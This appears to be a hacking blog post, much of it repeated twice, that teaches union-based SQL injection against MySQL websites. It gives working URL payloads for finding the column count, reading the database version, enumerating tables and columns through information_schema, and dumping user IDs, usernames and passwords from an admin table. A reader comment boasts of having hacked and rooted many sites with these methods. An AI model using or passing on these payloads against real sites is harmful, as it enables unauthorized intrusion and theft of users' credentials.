There are many types of sql injection but in this tutorial I will explain how you can extract columns ,tables containing useful data such as passwords ,user id , emails , admin pass and id .. etc
How To Find Vulnerable Site ?
There are many was to find vulnerable web sites finding vulnerabilities manually or using a web scanners For more you can refer my post on How to Find Vulnerable sites
How To Find Vulnerable Site ?
There are many was to find vulnerable web sites finding vulnerabilities manually or using a web scanners For more you can refer my post on How to Find Vulnerable sites
Exploiting The Vulnerability
Now say we have found a vulnerable site add ‘ at the end of the url and if it returns with a
Error message then the site is vulnerable
Example:-
Now we need to find the number of columns in current table
For this we use “order by” commond Add order by 1 --
To the end of the url . Increase the numbers till we get a error message
Example:-
And so on till we get a error message
Say we get a error message when we enter order by 5 --
Then number of columns in data base is 4
Now we use the “ union all select “ commond to find the vulnerable column
Add union all select + the number of columns that we found in the last step
Example:-
Now we should we should find some numbers popping out
Say we find one number 3 then column 3 is vulnerable
We can find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
Example:-
Now we must see the version of Msql at place where the number popped out in the previous step .If it is above 5 continue reading . If it is 4 and below then you have to brute force or guess the table and column names .
Now we need to find all the table names in the database. To do this we use the following commands
table_name ,information_schema.tables
Example:-
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as admin tables or member or user tables. And so on
Now we must find all the column names in the database, to do this we use the following command “group_concat(column_name) “,
Example:-
Now look for interesting names such as user name ,id ,email and password.
And so on
Finally we need to dump the data from the columns corresponding to the tables
For this we use the following command group_concat
Now say we want to get the “user id“ ,"username" and "password" fields, from table "admin" we use group_concat command
Example:-
If the command is successful we must find the user id , user name , password
Example :-
Most of the times the passwords are cyrpted to crack them refer my posts on Hashes and Salts
Hope you enjoyed this tutorial .If you have any doubts please be free to comment
Now say we have found a vulnerable site add ‘ at the end of the url and if it returns with a
Error message then the site is vulnerable
Example:-
www.vulnarable site.net/articles.php?id =1 ‘
Now we need to find the number of columns in current table
For this we use “order by” commond Add order by 1 --
To the end of the url . Increase the numbers till we get a error message
Example:-
www.vulnarable site.net/articles.php?id =1 order by 1--
www.vulnarable site.net/articles.php?id =1 order by 2--
www.vulnarable site.net/articles.php?id =1 order by 3--
www.vulnarable site.net/articles.php?id =1 order by 4--
www.vulnarable site.net/articles.php?id =1 order by 5 --
And so on till we get a error message
Say we get a error message when we enter order by 5 --
Then number of columns in data base is 4
Now we use the “ union all select “ commond to find the vulnerable column
Add union all select + the number of columns that we found in the last step
Example:-
www.vulnarable site.net/articles.php?id =1 union all select 1,2,3,4 --
Now we should we should find some numbers popping out
Say we find one number 3 then column 3 is vulnerable
We can find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user() , database(),version(),@@user,@@version,@@databaseFirst thing is to find the version of Mysql we add “@@ version “replacing the vulnerable column
Example:-
www.vulnarable site.net/articles.php?id =1 union all select 1,2,@@version ,4 --
Now we must see the version of Msql at place where the number popped out in the previous step .If it is above 5 continue reading . If it is 4 and below then you have to brute force or guess the table and column names .
Now we need to find all the table names in the database. To do this we use the following commands
table_name ,information_schema.tables
Example:-
www.vulnarable site.net/articles.php?id =1 Union all select 1,2,table_name,4 from information_schema.tables --
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as admin tables or member or user tables. And so on
Now we must find all the column names in the database, to do this we use the following command “group_concat(column_name) “,
Example:-
www.vulnerable site.net/articles.php?id =1 Union all select 1,2,group_concat(column_name) ,4 from information_schema.columns --
Now look for interesting names such as user name ,id ,email and password.
And so on
Finally we need to dump the data from the columns corresponding to the tables
For this we use the following command group_concat
Now say we want to get the “user id“ ,"username" and "password" fields, from table "admin" we use group_concat command
Example:-
www.vulnerable site.net/articles.php?id =1 Union all select 1,2,group_concat(user id ,0x3a, username,0x3a,password),4 from admin--
If the command is successful we must find the user id , user name , password
Example :-
1 : admin : pass
2 : user : password
Most of the times the passwords are cyrpted to crack them refer my posts on Hashes and Salts
Hope you enjoyed this tutorial .If you have any doubts please be free to comment
HEY bro your all posts on sqli are very nice. ! good work ! acctually i allready hacked so many sites with these methods, an i m also rooting on some of them ;)
REPLYreason to surf your website is to find some advance topic on sqli.. like..
1- post sqli tut
2- cookie based sqli.
b'coz i m mesing wid these .... also some other topics like
1-some md5 hashes are not cracked by on li9, tools takes so much time to crack..
2- common bt very irritating admin page finding,, :/ havij,perl scripts, onli9 sites fails to find admin page of some sites den wat to do... ! plz reply and ya make tut on post sqli, cookie sqli..! :p
Use the form below to comment. No spam please!!!